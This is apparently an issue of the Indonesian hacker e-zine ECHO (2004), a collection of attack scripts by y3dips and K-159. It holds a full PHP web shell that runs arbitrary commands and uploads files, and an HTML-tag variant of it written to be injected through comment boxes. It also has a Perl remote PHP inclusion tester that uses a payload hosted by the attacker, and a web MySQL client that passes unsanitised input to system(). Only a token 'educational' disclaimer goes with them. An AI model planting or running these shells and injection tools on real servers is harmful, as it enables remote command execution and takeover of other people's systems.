Issue‎ > ‎Issue 09‎ > ‎

013.txt


- ____________________ ___ ___ ________ --\_ _____/\_ ___ \ / | \\_____ \-- -| __)_ / \ \// ~ \/ | \-- -| \\ \___\ Y / | \-- -/_______ / \______ /\___|_ /\_______ /- - -\/ -\/ -\/ -\/- .OR.ID ECHO-ZINE RELEASE 09 Author: y3dips && K-159 Online @ www.echo.or.id :: http://ezine.echo.or.id == ECHO Skrapt 2004 == 01./Catet info browser dan IP >dot< php ~[ y3dips ] 02./Uplod File && $hell command via browser >dot< php ~[ y3dips ] 03.\General PHP injection Testing script >dot< perl ~[ y3dips ] 04.|MySQL management under web ~[ K-159 ] 05.\PHP upload file in HTML rulez.. ~[ K-159 ] 06.\using DIV to manipulating all of the page area :) (*smart enough isnt it) ~[k-159 ] .: BEGIN +++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ 01. Skrip Untuk Mencatat IP dan INFO BROWSER By : y3dips Language : PHP Resource : Buku php , from phpinfo(); (to get the variable) Published: http://geocities.com/y3d1ps/scrapt/catatip.php.txt Comment : skrip ini dibuat dengan bahasa pemrograman PHP , pd awalnya di gunakan pada situs echo.or.id , untuk halaman index-nya /*----- snip ----- <html> <head> <title> catet info browser dan ip </title> <?php if($HTTP_VIA == "") printf("<div align= center>%s :: diakses dari<i><b> ip </b></i> <b>$REMOTE_ADDR</b><br> dengan <i><b> browser</b></i> <b> $HTTP_USER_AGENT</b> </div>",date("D, d F Y")); else printf("<div align= center>%s :: </b> diakses dari<i><b> ip </b></i> <b>$HTTP_X_FORWARDED_FOR</b><br> dengan <i><b> browser</b></i> <b>$HTTP_USER_AGENT</B> melalui <b>$HTTP_VIA</b> dengan ip <i>$REMOTE_ADDR</i></div>",date("D, d F Y")); ?> </p> </body> </html> ------- snip -----*/ +++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ 02. Uplod File && $hell command via browser >dot< php ~[ y3dips ] By : y3dips Language : PHP Resource : .....PHP book, PHP manual <dot> chm Published: .... Comment : skrip ini dibuat dengan bahasa pemrograman PHP , digunakan sebagai halaman untuk mengupload file dan eksekusi $hell command via browser , dengan beberapa settingan 'tertentu' yang di "allow" pada php.ini dan httpd.conf /*----- snip ----- <!-- upload php shell made by y3dips (echo.or.id) for test only --> <!-- greetz to K-159 ,the_day, z3r0byt3, m0by , comex, c-a-s-e , S'to --> <html> <head> <title>#E-C-H-O Upl0ad $hell</title> </head> <BODY bgcolor="#000000"> <!-- ngatur direktori --> <? if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); } ?> <table> <tr><td bgcolor=#cccccc> <!-- eksekusi command dengan passthru --> <? if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="ls -la ; pwd ;id "; } echo "<b>"; echo "<div align=left><textarea name=report cols=70 rows=15>"; echo "".passthru($_POST['cmd']).""; echo "</textarea></div>"; echo "</b>"; ?> </td></tr></table> <!-- upload file --> <? if (($HTTP_POST_FILES["filenyo"]!=="") AND ($HTTP_POST_FILES["filenyo"])) { copy($HTTP_POST_FILES["filenyo"][tmp_name], $_POST['dir']."/".$HTTP_POST_FILES["filenyo"][name]) or print("<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><td><tr><font color=red face=arial> <div>file gak isa di uplod ".$HTTP_POST_FILES["filenyo"][name]."</div></font></td></tr></table>"); } ?> <table width=100% cellpadding=0 cellspacing=0 > <tr><td> <!-- form eksekusi command --> <? echo "<form name=command method=post>"; echo "<font face=Verdana size=1 color=red>"; echo "<b>[CmD ]</b><input type=text name=cmd size=33> "; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo " <b>[Dir]</b><input type=text name=dir size=40 value=".exec("pwd").">"; } else { echo "<input type=text name=dir size=40 value=".$_POST['dir'].">"; } echo " <input type=submit name=submit value=\"0k\">"; echo "</font>"; echo "</form>"; ?> </td></tr></table> <table width=100% cellpadding=0 cellspacing=0 > <!-- form upload --> <? echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; echo "<font face=Verdana size=1 color=red>"; echo "<b> [EcHo]</b>"; echo "<input type=file name=filenyo size=70> "; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=70 value=".exec("pwd").">"; } else { echo "<input type=hidden name=dir size=70 value=".$_POST['dir'].">"; } echo "<input type=submit name=submit value=\"0k\">"; echo "</font>"; echo "</form>"; ?> </td></tr></table> </html> ------- snip -----*/ +++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ 03.\General PHP injection Testing script By : y3dips Language : PeRl Resource : http://ezine.echo.or.id/ezine8/ez-r08-y3dips-becommunityeXplo.txt Published: ... in this ezine Comment : Skrip ini dibuat untuk testing remote injection terhadap php vuln sebenarnya untuk menggantikan fungsi browser , khususnya lagi dikembangkan dengan menggunakan file sebagai database target *_^ Petunjuk : masukkan lengkap path target yang vulnerable sesuai vulnerablenya, misal : $target = www.dudul.com/index.php?pageurl= serta path lengkap exploit filenya (read about injection script in attacker side) $xploit = www.keren.com/echo.txt dan yang perlu dilakukan dalam inputan adalah perl xplo.pl http://www.dudul.com/index.php?pageurl= www.keren.com/echo.txt /*----- snip ----- # xplo.pl #!/usr/bin/perl -w # Remote Testing PHP injection by y3dips [for testing only] print " * Remote Testing PHP injection by y3dips *\n"; require LWP::UserAgent; if(@ARGV == 2) { $target= $ARGV[0]; $xploit= $ARGV[1]; my $ua = LWP::UserAgent->new; $ua->agent("MSIE/6.0 Windows"); $ua->timeout(10); $ua->env_proxy; $url = "http://$target$xploit"; my $injek = $ua->get($url); print "---------------------------------------------------\n"; if ($injek->is_success) { print (" Sepertinya Vulnerable\n"); } else { print (" Sepertinya Tidak Vulnerable\n"); } print "---------------------------------------------------\n"; } else{ print "Gunakan: perl $0 [path vulnerable] [path xplo] \n"; } ===================== echo.txt -- cut -- <? echo "".passthru(' id ').""; ?> -- cut -- ------- snip -----*/ +++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ 04.\MySQL management under web By : k-159 Language : Php Resource : ..., based on explorer 1.4 lost noobs Published: ... in this ezine Comment : Manage SQL under web base /*----- snip ----- <!-- sql remote injection script by K-159 --> <!-- @t http://aikmel.com en http://echo.or.id --> <!-- based on explorer 1.4 lost noobs --> <html> <head><title>.:You Landed on K-159 Project:.</title> <body bgcolor="blue"> <? echo(" <FORM ENCTYPE=\"multipart/form-data\" METHOD=POST> <br><br><hr><br><br> Enter mysql client binary <br> <input name=\"sql_client\" type=\"text\" value=\"mysql\"> <br><br>Enter the login<br> <input name=\"sql_login\" type=\"text\" value=\"root\"> <br><br>Enter the password<br> <input name=\"sql_password\" type=\"text\" value=\"none\"> <br><br>Enter address of target<br> <input name=\"sql_host\" type=\"text\" value=\"Provide a target\"> <bR><br>Enter other port of mysql<br> <input name=\"sql_options\" type=\"text\" value=\"\"> <br><br>Enter valid SQL queries<br> <TEXTAREA input name=\"sql_query\" ROWS=10 COLS=35>SHOW DATABASES; # USE database_name; SHOW TABLES; # SELECT * FROM table_name;</TEXTAREA> <br><br><input name=\"submit\" type=\"submit\" value=\"Send !\"> <br><br><hr> </font></form> "); if($sql_client) { if ($sql_host == "Provide a target") // This checks that a target is set { echo("Please provide a valid target."); // No target is set } else if($sql_password == "none") // Ok for target, processing if no password is set { $sql_exec_option = "--execute=\"$sql_query\""; $system_cmd="$sql_client --user=$sql_login --host=$sql_host $sql_options $sql_exec_option"; $system_cmd=str_replace("\\\"","\"",$system_cmd); $system_cmd=str_replace("\\'","'",$system_cmd); echo("<br><br>Results for query : <b>$system_cmd</b> :<br><br><TEXTAREA COLS=100 ROWS=40>\"SQL query \"$sql_query\" results : ------------------------------------------------------------ "); system($system_cmd,$var); if($var != 0){ system($system_cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); } echo("</TEXTAREA>"); } else // processing when target is ok and when a password is provided { $sql_exec_option = "--execute=\"$sql_query\""; $system_cmd="$sql_client --user=$sql_login --password=$sql_password --host=$sql_host $sql_options $sql_exec_option"; $system_cmd=str_replace("\\\"","\"",$system_cmd); $system_cmd=str_replace("\\'","'",$system_cmd); echo("<br><br>Results for query : <b>$system_cmd</b> :<br><br><TEXTAREA COLS=100 ROWS=40>\"SQL query \"$sql_query\" results : ------------------------------------------------------------ "); system($system_cmd,$var); if($var != 0){ system($system_cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); } echo("</TEXTAREA>"); } // end of else } ?> </html> ------- snip -----*/ +++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ 05.\PHP upload file in HTML rulez.. By : k-159 Language : HTML Resource : ..., Published: ... in this ezine Comment : skrip ini dibuat saat mencoba membuat upload skrip dengan menumpang di box (comment, input) yang bisa hanya di inputkan html , but the server allow to execute php :) /*----- snip ----- <html> <head> <title>K-159 Project</title> </head> <BODY bgcolor="#000000"> <script language="php"> if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); } </script> <table> <tr><td bgcolor=#cccccc> <script language="php"> if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="ls -la ;uname -ar;pwd ;id;cat /etc/hosts "; } echo "<b>"; echo "<div align=left><textarea name=report cols=70 rows=15>"; echo "".passthru($_POST['cmd']).""; echo "</textarea></div>"; echo "</b>"; </script> </td></tr></table> <script language="php"> if (($HTTP_POST_FILES["filenyo"]!=="") AND ($HTTP_POST_FILES["filenyo"])) { copy($HTTP_POST_FILES["filenyo"][tmp_name], $_POST['dir']."/".$HTTP_POST_FILES["filenyo"][name]) or print("<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><td><tr><font color=red face=arial> <div>file [ ".$HTTP_POST_FILES["filenyo"][name]." ] Error Cuk !! !!</div></font></td></tr></table>"); } </script> <table width=100% cellpadding=0 cellspacing=0 > <tr><td> <script language="php"> echo "<form name=command method=post>"; echo "<font face=Verdana size=1 color=red>"; echo "<b>[CmD ]</b><input type=text name=cmd size=33> "; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo " <b>[Dir]</b><input type=text name=dir size=40 value=".exec("pwd").">"; } else { echo "<input type=text name=dir size=40 value=".$_POST['dir'].">"; } echo " <input type=submit name=submit value=\"0k\">"; echo "</font>"; echo "</form>"; </script> </td></tr></table> <table width=100% cellpadding=0 cellspacing=0 > <script language="php"> echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; echo "<font face=Verdana size=1 color=red>"; echo "<b> [EcHo]</b>"; echo "<input type=file name=filenyo size=70> "; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=70 value=".exec("pwd").">"; } else { echo "<input type=hidden name=dir size=70 value=".$_POST['dir'].">"; } echo "<input type=submit name=submit value=\"0k\">"; echo "</font>"; echo "</form>"; </script> </td></tr></table> </html> ------- snip -----*/ +++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ 06.\using DIV to manipulating all of the page area :) (*smart enough isnt it? ) By : k-159 Language : HTML Resource : ..., Published: ... in this ezine Comment : skrip ini digunakan untuk menutupi seluruh skrip lainnya (dengan penggunaan DIV) Petunjuk : letakkan potongan skrip ini di atas kode " page anda " :D /*----- snip ----- <div id="Layer1" style="position:absolute; left:0; top:0; width:4000; height:4090; z-index:1; background-color: #000000; layer-background-color: #ccccc; border: 1px none #000000"> ------- snip -----*/ +++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ Disclamier: all script on this article for educational purpose, echo.or.id does not accept responsibility for any damage or injury caused as a result of its use *greetz to: anak anak newbie_hacker[at]yahoogroups.com , #e-c-h-o , #aikmel all $ecurity Industry 1n INDONESIA kirimkan kritik && saran ke echostaff[at]echo<dot>or<dot>id
Comments